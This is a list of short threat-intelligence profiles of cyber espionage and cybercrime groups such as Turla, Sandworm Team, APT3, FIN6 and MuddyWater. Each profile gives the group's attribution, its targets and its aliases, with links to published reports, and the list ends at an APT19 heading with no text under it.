Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. [Cylance Cleaver](https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). [Dell Threat Group 2889](http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/)

Ke3chang

Ke3chang is a threat group attributed to actors operating out of China. Ke3chang has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010. [Mandiant Operation Ke3chang November 2014](https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs) [NCC Group APT15 Alive and Strong](https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/) [APT15 Intezer June 2018](https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/) [Microsoft NICKEL December 2021](https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe)

APT12

APT12 is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. [Meyers Numbered Panda](http://www.crowdstrike.com/blog/whois-numbered-panda/)

Deep Panda

Deep Panda is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. [Alperovitch 2014](https://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/) The intrusion into healthcare company Anthem has been attributed to Deep Panda. [ThreatConnect Anthem](https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/) This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. [RSA Shell Crew](https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf) Deep Panda also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. [Symantec Black Vine](https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf) Some analysts track Deep Panda and APT19 as the same group, but it is unclear from open source information if the groups are the same. [ICIT China's Espionage Jul 2016](https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/)

Turla

Turla is a cyber espionage threat group that has been attributed to Russia's Federal Security Service (FSB). They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. Turla is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as Uroburos. [Kaspersky Turla](https://securelist.com/the-epic-turla-operation/65545/) [ESET Gazer Aug 2017](https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf) [CrowdStrike VENOMOUS BEAR](https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/) [ESET Turla Mosquito Jan 2018](https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf) [Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023](https://www.cisa.gov/sites/default/files/2023-05/aa23-129a_snake_malware_2.pdf)

PittyTiger

PittyTiger is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control. [Bizeul 2014](https://airbus-cyber-security.com/the-eye-of-the-tiger/) [Villeneuve 2014](https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html)

Darkhotel

Darkhotel is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group's name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. Darkhotel has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks. [Kaspersky Darkhotel](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf) [Securelist Darkhotel Aug 2015](https://securelist.com/darkhotels-attacks-in-2015/71713/) [Microsoft Digital Defense FY20 Sept 2020](https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWxPuf)

APT30

APT30 is a threat group suspected to be associated with the Chinese government. While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches. [FireEye APT30](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/05/20081935/rpt-apt30.pdf) [Baumgartner Golovkin Naikon 2015](https://securelist.com/the-naikon-apt/69953/)

DragonOK

DragonOK is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, DragonOK is thought to have a direct or indirect relationship with the threat group Moafee. [Operation Quantum Entanglement](https://web.archive.org/web/20210920193513/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf) It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT. [New DragonOK](http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/)

admin@338

admin@338 is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as PoisonIvy, as well as some non-public backdoors. [FireEye admin@338](https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html)

Naikon

Naikon is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020). [CameraShy](http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf) Active since at least 2010, Naikon has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN). [CameraShy](http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf) [Baumgartner Naikon 2015](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf) While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches. [Baumgartner Golovkin Naikon 2015](https://securelist.com/the-naikon-apt/69953/)

Equation

Equation is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives. [Kaspersky Equation QA](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf)

Molerats

Molerats is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States. [DustySky](https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf) [DustySky2](http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf) [Kaspersky MoleRATs April 2019](https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/) [Cybereason Molerats Dec 2020](https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf)

APT3

APT3 is a China-based threat group that researchers have attributed to China's Ministry of State Security. [FireEye Clandestine Wolf](https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html) [Recorded Future APT3 May 2017](https://www.recordedfuture.com/research/chinese-mss-behind-apt3) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. [FireEye Clandestine Wolf](https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html) [FireEye Operation Double Tap](https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. [Symantec Buckeye](https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong)

APT16

APT16 is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. [FireEye EPS Awakens Part 2](https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html)

Putter Panda

Putter Panda is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA’s 3rd General Staff Department (GSD). [CrowdStrike Putter Panda](http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf)

APT17

APT17 is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. [FireEye APT17](https://web.archive.org/web/20240119213200/https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf)

APT18

APT18 is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. [Dell Lateral Movement](http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/)

Threat Group-3390

Threat Group-3390 is a Chinese threat group that has extensively used strategic Web compromises to target victims. [Dell TG-3390](https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors. [SecureWorks BRONZE UNION June 2017](https://www.secureworks.com/research/bronze-union) [Securelist LuckyMouse June 2018](https://securelist.com/luckymouse-hits-national-data-center/86083/) [Trend Micro DRBControl February 2020](https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf)

Threat Group-1314

Threat Group-1314 is an unattributed threat group that has used compromised credentials to log into a victim's remote access infrastructure. [Dell TG-1314](https://web.archive.org/web/20150626073312/http://www.secureworks.com/resources/blog/living-off-the-land/)

Scarlet Mimic

Scarlet Mimic is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group's motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by Scarlet Mimic and Putter Panda, it has not been concluded that the groups are the same. [Scarlet Mimic Jan 2016](http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/)

Lotus Blossom

Lotus Blossom is a long-standing threat group largely targeting various entities in Asia since at least 2009. In addition to government and related targets, Lotus Blossom has also targeted entities such as digital certificate issuers. [Lotus Blossom Jun 2015](https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html) [Symantec Bilbug 2022](https://www.security.com/threat-intelligence/espionage-asia-governments-cert-authority) [Cisco LotusBlossom 2025](https://blog.talosintelligence.com/lotus-blossom-espionage-group/)

Poseidon Group

Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm. [Kaspersky Poseidon Group](https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/)

Sandworm Team

Sandworm Team is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455. [US District Court Indictment GRU Unit 74455 October 2020](https://www.justice.gov/opa/press-release/file/1328521/download) [UK NCSC Olympic Attacks October 2020](https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games) This group has been active since at least 2009. [iSIGHT Sandworm 2014](https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html) [CrowdStrike VOODOO BEAR](https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/) [USDOJ Sandworm Feb 2020](https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia/index.html) [NCSC Sandworm Feb 2020](https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory) In October 2020, the US indicted six GRU Unit 74455 officers associated with Sandworm Team for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide NotPetya attack, targeting of the 2017 French presidential campaign, the 2018 Olympic Destroyer attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019. [US District Court Indictment GRU Unit 74455 October 2020](https://www.justice.gov/opa/press-release/file/1328521/download) [UK NCSC Olympic Attacks October 2020](https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as APT28. [US District Court Indictment GRU Oct 2018](https://www.justice.gov/opa/page/file/1098481/download)

Dragonfly

Dragonfly is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16. [DOJ Russia Targeting Critical Infrastructure March 2022](https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical) [UK GOV FSB Factsheet April 2022](https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet) Active since at least 2010, Dragonfly has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks. [Symantec Dragonfly](https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments) [Secureworks IRON LIBERTY July 2019](https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector) [Symantec Dragonfly Sept 2017](https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group) [Fortune Dragonfly 2.0 Sept 2017](http://fortune.com/2017/09/06/hack-energy-grid-symantec/) [Gigamon Berserk Bear October 2021](https://vblocalhost.com/uploads/VB2021-Slowik.pdf) [CISA AA20-296A Berserk Bear December 2020](https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions) [Symantec Dragonfly 2.0 October 2017](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks)

GCMAN

GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. [Securelist GCMAN](https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/)

FIN6

FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors. [FireEye FIN6 April 2016](https://web.archive.org/web/20190807112824/https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf) [FireEye FIN6 Apr 2019](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html)

Stealth Falcon

Stealth Falcon is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. [Citizen Lab Stealth Falcon May 2016](https://citizenlab.org/2016/05/stealth-falcon/)

Suckfly

Suckfly is a China-based threat group that has been active since at least 2014. [Symantec Suckfly March 2016](http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates)

Patchwork

Patchwork is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Patchwork has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018. [Cymmetria Patchwork](https://web.archive.org/web/20180825085952/https:/s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf) [Symantec Patchwork](http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries) [TrendMicro Patchwork Dec 2017](https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf) [Volexity Patchwork June 2018](https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/)

Strider

Strider is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda. [Symantec Strider Blog](http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets) [Kaspersky ProjectSauron Blog](https://securelist.com/faq-the-projectsauron-apt/75533/)

Group5

Group5 is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. Group5 has used two commonly available remote access tools (RATs), njRAT and NanoCore, as well as an Android RAT, DroidJack. [Citizen Lab Group5](https://citizenlab.ca/2016/08/group5-syria/)

menuPass

menuPass is a threat group that has been active since at least 2006. Individual members of menuPass are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company. [DOJ APT10 Dec 2018](https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion) [District Court of NY APT10 Indictment December 2018](https://www.justice.gov/opa/page/file/1122671/download) menuPass has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university. [Palo Alto menuPass Feb 2017](http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/) [Crowdstrike CrowdCast Oct 2013](https://www.slideshare.net/slideshow/crowd-casts-monthly-you-have-an-adversary-problem/27262315) [FireEye Poison Ivy](https://www.mandiant.com/sites/default/files/2021-09/rpt-poison-ivy.pdf) [PWC Cloud Hopper April 2017](https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [FireEye APT10 April 2017](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) [DOJ APT10 Dec 2018](https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion) [District Court of NY APT10 Indictment December 2018](https://www.justice.gov/opa/page/file/1122671/download)

Gamaredon Group

Gamaredon Group is a suspected Russian cyber espionage group that has targeted military, law enforcement, judiciary, non-profit, and non-governmental organizations in Ukraine since at least 2013. The name Gamaredon Group derives from a misspelling of the word "Armageddon," found in early campaigns. [Palo Alto Gamaredon Feb 2017](https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/) [TrendMicro Gamaredon April 2020](https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/) [ESET Gamaredon June 2020](https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/) [Symantec Shuckworm January 2022](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine) [Microsoft Actinium February 2022](https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/) In November 2021, the Ukrainian government publicly attributed Gamaredon Group to Russia’s Federal Security Service (FSB) Center 18, an assessment later supported by multiple independent cybersecurity researchers. [Bleepingcomputer Gamardeon FSB November 2021](https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/) [Microsoft Actinium February 2022](https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/)

RTM

RTM is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name (RTM). [ESET RTM Feb 2017](https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf)

FIN10

FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. [FireEye FIN10 June 2017](https://services.google.com/fh/files/misc/rpt-fin-10-anatomy-of-a-cyber-en.pdf)

CopyKittens

CopyKittens is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip. [ClearSky CopyKittens March 2017](http://www.clearskysec.com/copykitten-jpost/) [ClearSky Wilted Tulip July 2017](http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf) [CopyKittens Nov 2015](https://cdn2.hubspot.net/hubfs/1903456/Whitepapers/CopyKittens.pdf)

FIN5

FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. [FireEye Respond Webinar July 2017](https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html) [Mandiant FIN5 GrrCON Oct 2016](https://www.youtube.com/watch?v=fevGZs0EQu8) [DarkReading FireEye FIN5 Oct 2015](https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?)

Sowbug

Sowbug is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. [Symantec Sowbug Nov 2017](https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments)

NEODYMIUM

NEODYMIUM is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called PROMETHIUM due to overlapping victim and campaign characteristics. [Microsoft NEODYMIUM Dec 2016](https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/) [Microsoft SIR Vol 21](http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf) NEODYMIUM is reportedly associated closely with BlackOasis operations, but evidence that the group names are aliases has not been identified. [CyberScoop BlackOasis Oct 2017](https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/)

PROMETHIUM

PROMETHIUM is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. PROMETHIUM has demonstrated similarity to another activity group called NEODYMIUM due to overlapping victim and campaign characteristics. [Microsoft NEODYMIUM Dec 2016](https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/) [Microsoft SIR Vol 21](http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf) [Talos Promethium June 2020](https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html)

BRONZE BUTLER

BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry. [Trend Micro Daserf Nov 2017](http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/) [Secureworks BRONZE BUTLER Oct 2017](https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses) [Trend Micro Tick November 2019](https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf)

FIN8

FIN8 is a financially motivated threat group that has been active since at least January 2016 and is known for targeting organizations in the hospitality, retail, entertainment, insurance, technology, chemical, and financial sectors. In June 2021, security researchers detected FIN8 switching from targeting point-of-sale (POS) devices to distributing a number of ransomware variants. [FireEye Obfuscation June 2017](https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html) [FireEye Fin8 May 2016](https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html) [Bitdefender Sardonic Aug 2021](https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf) [Symantec FIN8 Jul 2023](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor)

TA459

TA459 is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. [Proofpoint TA459 April 2017](https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts)

BlackOasis

BlackOasis is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. [Securelist BlackOasis Oct 2017](https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/) [Securelist APT Trends Q2 2017](https://securelist.com/apt-trends-report-q2-2017/79332/) A group known by Microsoft as NEODYMIUM is reportedly associated closely with BlackOasis operations, but evidence that the group names are aliases has not been identified. [CyberScoop BlackOasis Oct 2017](https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/)

APT33

APT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. [FireEye APT33 Sept 2017](https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html) [FireEye APT33 Webinar Sept 2017](https://www.brighttalk.com/webcast/10703/275683)

Elderwood

Elderwood is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. [Security Affairs Elderwood Sept 2012](http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html) The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers. [Symantec Elderwood Sept 2012](https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf) [CSM Elderwood Sept 2012](https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China)

APT37

APT37 is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. APT37 has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018. [FireEye APT37 Feb 2018](https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf) [Securelist ScarCruft Jun 2016](https://securelist.com/operation-daybreak/75100/) [Talos Group123](https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.

PLATINUM

PLATINUM is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. [Microsoft PLATINUM April 2016](https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf)

MuddyWater

MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS). [CYBERCOM Iranian Intel Cyber January 2022](https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/) Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America. [Unit 42 MuddyWater Nov 2017](https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/) [Symantec MuddyWater Dec 2018](https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group) [ClearSky MuddyWater Nov 2018](https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf) [ClearSky MuddyWater June 2019](https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf) [Reaqta MuddyWater November 2017](https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/) [DHS CISA AA22-055A MuddyWater February 2022](https://www.cisa.gov/uscert/ncas/alerts/aa22-055a) [Talos MuddyWater Jan 2022](https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html)

Dark Caracal

Dark Caracal is a threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. [Lookout Dark Caracal Jan 2018](https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf)

Orangeworm

Orangeworm is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage. [Symantec Orangeworm April 2018](https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia) Reverse engineering of Kwampirs, directly associated with Orangeworm activity, indicates significant functional and development overlaps with Shamoon. [Cylera Kwampirs 2022](https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf)

APT19

